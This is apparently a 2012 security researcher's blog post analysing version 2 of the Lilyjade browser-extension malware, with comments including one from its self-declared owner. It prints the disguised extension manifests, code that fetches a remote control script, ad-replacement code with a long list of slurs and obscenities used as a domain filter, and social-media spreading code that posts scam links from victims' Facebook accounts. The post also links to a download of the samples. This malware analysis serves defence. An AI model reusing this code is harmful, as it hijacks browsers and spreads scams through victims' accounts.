After posting the latest browser extension malware, I decided to check up on the first posted on the site, Lilyjade. While all of the reported hosts had been shutdown, I located a new one, which claimed to host Lilyjade version 2
Here’s a look at the new version of the Lilyjade malware
The first change is the lack of crossrider. While the first version used the cross browser extension framework to provide extensions for both Chrome and Firefox, v2 takes a different approach to each browser.
The Chrome extension is hosted and updated off of dropbox. There are no signs that indicate that it has been created by a cross browser extension site.
{
"manifest_version": 2,
"content_scripts": [ {
"all_frames": true,
"js": [ "go.js" ],
"matches": [ "u003Call_urlsu003E" ]
} ],
"description": "Required System Extension",
"icons": {
"128": "icon128.png",
"16": "icon16.png",
"48": "icon48.png"
},
"background": {
"scripts": ["background.js"]
},
"name": "YouTube Stability Engine",
"permissions": [ "<all_urls>" , "unlimitedStorage", "tabs"],
"version": "2.6.0",
"update_url": "http://dl.dropbox.com/u/64537922/lj/update.xml"
}
The Firefox extension is much larger, and appears to be the Chrome extension converted using extensionfactory.com, which added a wrapper to run the Chrome extension on Firefox. The main extension code remains the same as the Chrome extension
<Description about="urn:mozilla:install-manifest">
<em:name>YouTube Stability Engine</em:name>
<em:unpack>true</em:unpack>
<em:bootstrap>true</em:bootstrap>
<em:updateURL>https://gallery.extensionfactory.com/labs/conversion/update/miophknchcebolnhaahfcolbccopgaga/</em:updateURL>
<em:version>2.6.0</em:version>
<em:targetApplication>
<Description>
<em:minVersion>4.0</em:minVersion>
<em:maxVersion>99.*</em:maxVersion>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
</Description>
</em:targetApplication>
<em:type>2</em:type>
<em:id>miophknchcebolnhaahfcolbccopgaga@slicefactory.com</em:id>
<em:description>Required System Extension</em:description>
</Description>
The main part of the extension is the background.js file, which downloads and runs a javascript file from the control panel.
For this version of Lilyjade, the file is located at
http://lilyjadev2.com/panel/cache/6ad01eb4c2c1405636a6b85678506e8d.js
.
This script contains the code neccessary for replacing ads, posting on facebook and twitter and the analytics code for tracking the number of infected browsers.
function loadWidget(id, callback) {
$LAB.setOptions({
AppendTo: "body"
}).script({
charset: "utf-8",
type: "text/javascript",
src: "http://ws.amazon.com/widgets/q?ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/enz-20/8001/25a54e74-2ee7-4e6c-8e3c-bd913fdcec00"
}).block(function () {
renderMarkup($$(id), callback);
});
}
function loadAnalytics(id, callback) {
var gaJsHost = (("https:" === document.location.protocol) ? "https://ssl." : "http://www.");
$LAB.setOptions({
AppendTo: "body"
}).script({
type: "text/javascript",
src: gaJsHost + "google-analytics.com/ga.js"
}).block(function () {
renderMarkup($$(id), function () {
try {
var pageTracker = window._gat._getTracker("UA-10493018-2");
pageTracker._trackPageview();
} catch (err) {}
callback();
});
});
}
The ad replacing code has a simplistic filter that checks the domain name of the visited site for adult terms, in an attempt to avoid the suspension of the adsense account.
function replaceAd(w, h, aid, rand) {
if (w != null && h != null && aid != null && rand != null) {
windowOnload();
captureOnloadListeners();
window.onload = null;
captureMarkup();
window.setTimeout(function () {
loadAds(rand, w, h, "ca-pub-8295585119185751", aid);
}, 250);
} else {
if (!domainMatch("*ahole*", "*anus*", "*ash0le*", "*ash0les*", "*asholes*", "*ass*", "*Ass Monkey*", "*Assface*", "*assh0le*", "*assh0lez*", "*asshole*", "*assholes*", "*assholz*", "*asswipe*", "*azzhole*", "*bassterds*", "*bastard*", "*bastards*", "*bastardz*", "*basterds*", "*basterdz*", "*Biatch*", "*bitch*", "*bitches*", "*Blow Job*", "*boffing*", "*butthole*", "*buttwipe*", "*c0ck*", "*c0cks*", "*c0k*", "*Carpet Muncher*", "*cawk*", "*cawks*", "*Clit*", "*cnts*", "*cntz*", "*cock*", "*cockhead*", "*cock-head*", "*cocks*", "*CockSucker*", "*cock-sucker*", "*crap*", "*cum*", "*cunt*", "*cunts*", "*cuntz*", "*dick*", "*dild0*", "*dild0s*", "*dildo*", "*dildos*", "*dilld0*", "*dilld0s*", "*dominatricks*", "*dominatrics*", "*dominatrix*", "*dyke*", "*enema*", "*f u c k*", "*f u c k e r*", "*fag*", "*fag1t*", "*faget*", "*fagg1t*", "*faggit*", "*faggot*", "*fagit*", "*fags*", "*fagz*", "*faig*", "*faigs*", "*fart*", "*flipping the bird*", "*fuck*", "*fucker*", "*fuckin*", "*fucking*", "*fucks*", "*Fudge Packer*", "*fuk*", "*Fukah*", "*Fuken*", "*fuker*", "*Fukin*", "*Fukk*", "*Fukkah*", "*Fukken*", "*Fukker*", "*Fukkin*", "*g00k*", "*gay*", "*gayboy*", "*gaygirl*", "*gays*", "*gayz*", "*God-damned*", "*h00r*", "*h0ar*", "*h0re*", "*hells*", "*hoar*", "*hoor*", "*hoore*", "*jackoff*", "*jap*", "*japs*", "*jerk-off*", "*jisim*", "*jiss*", "*jizm*", "*jizz*", "*knob*", "*knobs*", "*knobz*", "*kunt*", "*kunts*", "*kuntz*", "*Lesbian*", "*Lezzian*", "*Lipshits*", "*Lipshitz*", "*masochist*", "*masokist*", "*massterbait*", "*masstrbait*", "*masstrbate*", "*masterbaiter*", "*masterbate*", "*masterbates*", "*Motha Fucker*", "*Motha Fuker*", "*Motha Fukkah*", "*Motha Fukker*", "*Mother Fucker*", "*Mother Fukah*", "*Mother Fuker*", "*Mother Fukkah*", "*Mother Fukker*", "*mother-fucker*", "*Mutha Fucker*", "*Mutha Fukah*", "*Mutha Fuker*", "*Mutha Fukkah*", "*Mutha Fukker*", "*n1gr*", "*nastt*", "*nigger;*", "*nigur;*", "*niiger;*", "*niigr;*", "*orafis*", "*orgasim;*", "*orgasm*", "*orgasum*", "*oriface*", "*orifice*", "*orifiss*", "*packi*", "*packie*", "*packy*", "*paki*", "*pakie*", "*paky*", "*pecker*", "*peeenus*", "*peeenusss*", "*peenus*", "*peinus*", "*pen1s*", "*penas*", "*penis*", "*penis-breath*", "*penus*", "*penuus*", "*Phuc*", "*Phuck*", "*Phuk*", "*Phuker*", "*Phukker*", "*polac*", "*polack*", "*polak*", "*Poonani*", "*pr1c*", "*pr1ck*", "*pr1k*", "*pusse*", "*pussee*", "*pussy*", "*puuke*", "*puuker*", "*queer*", "*queers*", "*queerz*", "*qweers*", "*qweerz*", "*qweir*", "*recktum*", "*rectum*", "*retard*", "*sadist*", "*scank*", "*schlong*", "*screwing*", "*semen*", "*sex*", "*sexy*", "*Sh!t*", "*sh1t*", "*sh1ter*", "*sh1ts*", "*sh1tter*", "*sh1tz*", "*shit*", "*shits*", "*shitter*", "*Shitty*", "*Shity*", "*shitz*", "*Shyt*", "*Shyte*", "*Shytty*", "*Shyty*", "*skanck*", "*skank*", "*skankee*", "*skankey*", "*skanks*", "*Skanky*", "*slut*", "*sluts*", "*Slutty*", "*slutz*", "*son-of-a-bitch*", "*tit*", "*turd*", "*va1jina*", "*vag1na*", "*vagiina*", "*vagina*", "*vaj1na*", "*vajina*", "*vullva*", "*vulva*", "*w0p*", "*wh00r*", "*wh0re*", "*whore*", "*xrated*", "*xxx*", "*b!+ch*", "*bitch*", "*blowjob*", "*clit*", "*arschloch*", "*fuck*", "*shit*", "*ass*", "*asshole*", "*b!tch*", "*b17ch*", "*b1tch*", "*bastard*", "*bi+ch*", "*boiolas*", "*buceta*", "*c0ck*", "*cawk*", "*chink*", "*cipa*", "*clits*", "*cock*", "*cum*", "*cunt*", "*dildo*", "*dirsa*", "*ejakulate*", "*fatass*", "*fcuk*", "*fuk*", "*fux0r*", "*hoer*", "*hore*", "*jism*", "*kawk*", "*l3itch*", "*l3i+ch*", "*lesbian*", "*masturbate*", "*masterbat*", "*masterbat3*", "*motherfucker*", "*s.o.b.*", "*mofo*", "*nazi*", "*nigga*", "*nigger*", "*nutsack*", "*phuck*", "*pimpis*", "*pusse*", "*pussy*", "*scrotum*", "*sh!t*", "*shemale*", "*shi+*", "*sh!+*", "*slut*", "*smut*", "*teets*", "*tits*", "*boobs*", "*b00bs*", "*teez*", "*testical*", "*testicle*", "*titt*", "*w00se*", "*jackoff*", "*wank*", "*whoar*", "*whore*", "*damn*", "*dyke*", "*fuck*", "*shit*", "*@$$*", "*amcik*", "*andskota*", "*arse*", "*assrammer*", "*ayir*", "*bi7ch*", "*bitch*", "*bollock*", "*breasts*", "*butt-pirate*", "*cabron*", "*cazzo*", "*chraa*", "*chuj*", "*Cock*", "*cunt*", "*d4mn*", "*daygo*", "*dego*", "*dick*", "*dike*", "*dupa*", "*dziwka*", "*ejackulate*", "*Ekrem*", "*Ekto*", "*enculer*", "*faen*", "*fag*", "*fanculo*", "*fanny*", "*feces*", "*feg*", "*Felcher*", "*ficken*", "*fitt*", "*Flikker*", "*foreskin*", "*Fotze*", "*fuk*", "*futkretzn*", "*gay*", "*gook*", "*guiena*", "*h0r*", "*h4x0r*", "*hell*", "*helvete*", "*hoer*", "*honkey*", "*Huevon*", "*hui*", "*injun*", "*jizz*", "*kanker*", "*kike*", "*klootzak*", "*kraut*", "*knulle*", "*kuk*", "*kuksuger*", "*Kurac*", "*kurwa*", "*kusi*", "*kyrpa*", "*lesbo*", "*mamhoon*", "*masturbat*", "*merd*", "*mibun*", "*monkleigh*", "*mouliewop*", "*muie*", "*mulkku*", "*muschi*", "*nazis*", "*nepesaurio*", "*nigger*", "*orospu*", "*paska*", "*perse*", "*picka*", "*pierdol*", "*pillu*", "*pimmel*", "*piss*", "*pizda*", "*poontsee*", "*poop*", "*porn*", "*p0rn*", "*pr0n*", "*preteen*", "*pula*", "*pule*", "*puta*", "*puto*", "*qahbeh*", "*queef*", "*rautenberg*", "*schaffer*", "*scheiss*", "*schlampe*", "*schmuck*", "*screw*", "*sh!t*", "*sharmuta*", "*sharmute*", "*shipal*", "*shiz*", "*skribz*", "*skurwysyn*", "*sphencter*", "*spic*", "*spierdalaj*", "*splooge*", "*suka*", "*b00b*", "*testicle*", "*titt*", "*twat*", "*vittu*", "*wank*", "*wetback*", "*wichser*", "*wop*", "*yed*", "*zabourah*")) {
initWindow();
FacebookSpread();
TwitterSpread();
}
}
}
There also appears to be a function for replacing amazon widgets with one coded into the extension.
The facebook posting has expanded out into liking pages and creating events as well as posting onto the wall of the affected account.
The twitter spread simply tweets the selected message from the affected account.
Controlling these functions is done from the javascript, with the spreading terms and selected options coded into the file. The panel appears to simply modify the .js file, which could done easily by hand if anyone was enclined to use lilyjade for free.
var aduse = 1; var spreaduse = 1; var likeuse = 1; var eventuse = 1; var tweetuse = 1; var htmlsrc = ""; var ROOTSERVER = "lilyjadev2.com";
function FacebookSpread() {
if ((document.domain).toLowerCase() == "facebook.com" && isFacebook()) {
if (getCookie("spread") == null) {
if (likeuse == 1) likePage();
if (spreaduse == 1) sharePage("http://i.imgur.com/yW4BA.jpg", "http://faecbook.nazuka.net/pop.html", "iPhone 5 beta for Free!!!", "At last The Beta of iPhone 5 is out!", "Here's your chance to get the iPhone 5 beta for free! Go to : http://j.gs/868755/iphone5", "30713015083");
if (eventuse == 1) createEvent("Free Youtube Goodies, Tshirts and more!", "Youtube is giving out cool stuff like tshirts,watches and much more! Take yours from here http://faecbook.nazuka.net");
setCookie("spread", "active", 1);
}
}
}
The Adsense account affiliated with the extension is
ca-pub-8295585119185751
The Google Analytics account is
UA-10493018-2
The Amazon widget account is
25a54e74-2ee7-4e6c-8e3c-bd913fdcec00
The Dropbox account used for update checks and distributing the extension is
/u/64537922/
(This account has been used in the past to distribute malware)
The website used for the current spreading campaign is
http://faecbook.nazuka.net
Download containing the both extensions and the current 6ad01eb4c2c1405636a6b85678506e8d.js file: Download
Hosting info: http://whois.domaintools.com/199.83.213.170
Dru Mundorff - August 9, 2012 at 2:31 pm
If you look the sites added are blockers. This is to show you we are loading to protect people. Congratulations for looking like a fill.. What others did with their previous accts on drop box is no concern for Lilyjade. Otherwise yes everything here as posted was also Term's of Serviced. Congratulations on a failure attempt. Also you can highlight that the system has a poster for Facebook congrats also we got twitter also. You left out we now can convert ads as cpa. 🙂
Sincerely
The Owner of LilyJade
CodeCompiler
Dru Mundorff
Spades - August 12, 2012 at 5:29 pm
Have fun when the FBI knocks on (destroys) your door in a year or 2, Dru.
Anonymous - August 23, 2012 at 10:21 pm
http://hackforums.net/showthread.php?tid=2799806
Anonymous - August 27, 2012 at 2:05 pm
they already have your full info, dru
they're just waiting for you to do more stupid things to keep you in prison longer